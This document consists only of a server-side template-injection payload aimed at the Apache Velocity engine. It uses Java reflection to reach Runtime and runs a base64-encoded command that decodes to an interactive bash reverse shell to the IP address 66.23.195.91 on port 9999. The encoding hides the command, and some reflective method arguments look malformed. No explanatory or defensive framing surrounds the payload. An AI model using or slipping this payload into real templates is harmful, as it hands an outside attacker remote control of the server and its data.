#set($e="e")
$e.getClass().forName('java.lang.Runtime').getMethod('getRuntime', $e.getClass().forName('java.lang.Runtime')).invoke(String.class.getClass().forName("java.lang.Runtime"),new String[]{"/bin/bash","-c",'echo "YmFzaCAtaSA+JiAvZGV2L3RjcC82Ni4yMy4xOTUuOTEvOTk5OSAwPiYx"|base64 -d |bash'}).toString()
